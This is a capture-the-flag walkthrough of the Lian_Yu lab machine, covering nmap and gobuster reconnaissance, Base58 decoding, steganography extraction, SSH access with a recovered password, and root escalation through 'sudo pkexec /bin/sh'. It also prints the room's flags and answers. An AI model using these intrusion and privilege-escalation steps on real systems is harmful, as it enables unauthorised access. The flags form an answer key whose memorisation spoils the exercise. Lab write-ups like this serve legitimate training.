🔗 Lian_Yu
Task 1 - Deploy the machine
🎯 Target IP: 10.10.95.230
Create a directory for machine on the Desktop and a directory containing the scans with nmap.
Task 2 - Reconnaissance
Copy su
echo "10.10.95.230 lian_yu.thm" >> /etc/hosts
mkdir thm/lian_yu
cd thm/lian_yu
mkdir {nmap,content,exploits,scripts}
# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts
I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
Copy ping -c 3 lian_yu.thm
PING lian_yu.thm (10.10.95.230) 56( 84 ) bytes of data.
64 bytes from lian_yu.thm (10.10.95.230): icmp_seq = 1 ttl = 63 time = 66.7 ms
64 bytes from lian_yu.thm (10.10.95.230): icmp_seq = 2 ttl = 63 time = 62.1 ms
64 bytes from lian_yu.thm (10.10.95.230): icmp_seq = 3 ttl = 63 time = 62.6 ms
Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix, while Windows systems usually have a TTL of 128 secs.
Of course, start to check information scanning open ports:
Copy nmap --open -p0- -n -Pn -vvv --min-rate 5000 lian_yu.thm -oG nmap/port_scan
Copy PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
111/tcp open rpcbind syn-ack ttl 63
52286/tcp open unknown syn-ack ttl 63
output to file with nmap formatting
It looks like there are 5 open ports on the machine: 21,22,80,111,52286.
Now, we need to search which services are running on open ports:
Copy nmap -p21,22,80,111,52286 -n -Pn -vvv -sCV --min-rate 5000 lian_yu.thm -oN nmap/open_port
Copy PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.2
22/tcp open ssh syn-ack ttl 63 OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0 )
| ssh-hostkey:
| 1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAOZ67Cx0AtDwHfVa7iZw6O6htGa3GHwfRFSIUYW64PLpGRAdQ734COrod9T+pyjAdKscqLbUAM7xhSFpHFFGM7NuOwV+d35X8CTUM882eJX+t3vhEg9d7ckCzNuPnQSpeUpLuistGpaP0HqWTYjEncvDC0XMYByf7gbqWWU2pe9HAAAAFQDWZIJ944u1Lf3PqYCVsW48Gm9qCQAAAIBfWJeKF4FWRqZzPzquCMl6Zs/y8od6NhVfJyWfi8APYVzR0FR05YCdS2OY4C54/tI5s6i4Tfpah2k+fnkLzX74fONcAEqseZDOffn5bxS+nJtCWpahpMdkDzz692P6ffDjlSDLNAPn0mrJuUxBFw52Rv+hNBPR7SKclKOiZ86HnQAAAIAfWtiPHue0Q0J7pZbLeO8wZ9XNoxgSEPSNeTNixRorlfZBdclDDJcNfYkLXyvQEKq08S1rZ6eTqeWOD4zGLq9i1A+HxIfuxwoYp0zPodj3Hz0WwsIB2UzpyO4O0HiU6rvQbWnKmUaH2HbGtqJhYuPr76XxZtwK4qAeFKwyo87kzg==
| 2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRbgwcqyXJ24ulmT32kAKmPww+oXR6ZxoLeKrtdmyoRfhPTpCXdocoj0SqjsETI8H0pR0OVDQDMP6lnrL8zj2u1yFdp5/bDtgOnzfd+70Rul+G7Ch0uzextmZh7756/VrqKn+rdEVWTqqRkoUmI0T4eWxrOdN2vzERcvobqKP7BDUm/YiietIEK4VmRM84k9ebCyP67d7PSRCGVHS218Z56Z+EfuCAfvMe0hxtrbHlb+VYr1ACjUmGIPHyNeDf2430rgu5KdoeVrykrbn8J64c5wRZST7IHWoygv5j9ini+VzDhXal1H7l/HkQJKw9NSUJXOtLjWKlU4l+/xEkXPxZ
| 256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPfrP3xY5XGfIk2+e/xpHMTfLRyEjlDPMbA5FLuasDzVbI91sFHWxwY6fRD53n1eRITPYS1J6cBf+QRtxvjnqRg=
| 256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (ED25519)
| _ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDexCVa97Otgeg9fCD4RSvrNyB8JhRKfzBrzUMe3E/Fn
80/tcp open http syn-ack ttl 63 Apache httpd
| http-methods:
| _ Supported Methods: GET HEAD POST OPTIONS
| _http-title: Purgatory
| _http-server-header: Apache
111/tcp open rpcbind syn-ack ttl 63 2-4 (RPC #100000)
| _rpcinfo: ERROR: Script execution failed (use -d to debug )
52286/tcp open status syn-ack ttl 63 1 (RPC #100024)
Service Info: OSs: Unix, Linux ; CPE: cpe:/o:linux:linux_kernel
Task 3 - Find the flags
3.1 What is the Web Directory you found?
Then we can start to see website (port 80):
We find this info in the footer of website:
Note: Hi Everyone, I am a huge fan to Arrowverse, I built this vm concept based on Arrow (first season) you will find a few things similar here and I posted this Content here just to entertain you, To complete this CTF it isn't mandatory to have knowledge on Arrrowverse series. I hope you will Enjoy the content and have fun :).
We continue exploring web source code to find eventual information disclosure.
No other informations, another good thing to do, is find hidden paths on website using gobuster
Copy gobuster dir -u lian_yu.thm -w /usr/share/wordlists/dirb/common.txt
Very bad, we find only index page that we've just see.
We can try to use a bigger wordlist such as directory-list-2.3-medium.txt
Copy gobuster dir -u lian_yu.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Excellent! We find a new web path: /island, search it!
Note this code word: vigilante.
We can try to retake another dirbuster search starting with island/ web path:
Copy gobuster dir -u lian_yu.thm/island/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Then, we can answer at first question.
3.2 What is the file name you found?
Explore /2100 web page:
Viewing source code:
we see this info:
you can avail your .ticket here but how?
Retaking another dirbuster search starting with 2100/ web path, we see that there're nothing, then we can try to custom dirbuster search using .ticket extension:
Copy gobuster dir -u lian_yu.thm/island/2100/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .ticket
Wow, we've the path to the ticket which is the answer to this question as well.
3.3 - What is the FTP Password?
Open it we see this potential encrypted word, then we can use CyberChef to decrypt it.
After multiple trial and error attempts, we can determine that this is a Base58 encoding.
Remember that we've a potential username: 'vigilante', then we try to login with ftp:
Download these resources using mget *
command.
There're three images with potential hidden info inside.
The 'Leave_me_alone.png' image is corrupt, seeing header we see that's not '.png':
Copy xxd Leave_me_alone.png | head
then we can modify it using hexeditor and display it, getting information about psw:
Copy hexeditor Leave_me_alone.png
Perfect, we can try to extract info using steghide tool and psw retrevied few time ago:
Copy steghide extract -sf aa.jpg
Copy unzip ss.zip
#we find two files
The content of shado file can be more interesting!
3.4 - What is the file name with SSH password?
Trying the same FTP credentials we can't access with SSH.
Then, we've try to use the same username and brute force psw using Hydra, but it doesn't work.
First to brute force user and psw, we can try to re-access with FTP and check home folder of system users:
Very good, we find another user: slade, and probably ssh psw matched into shado file (M3tahuman).
Try it!
Copy ssh slade@10.10.244.228
Well done!
3.5 - Find user.txt flag
Using find command we can search quickly user flag and open it with cat:
Copy find / -type f -iname "user.txt" 2> /dev/null
🚩User Flag (user.txt)THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T}
3.5 - Find root.txt flag
We can do sudo -l
command to discover user's permissions.
Very good pkexec has root permission!
Search on GTFOBins (https://gtfobins.github.io/ ) and find our exploit:
Run it to became root and find flag (how the last task):
Copy sudo pkexec /bin/sh #privilege escalation
/bin/bash -i #spawn shell
find / -type f -iname "root.txt" 2> /dev/null #find root flag
cat /root/root.txt #see root.txt
🚩 Root Flag (root.txt)THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_I'LL_BE_D34D}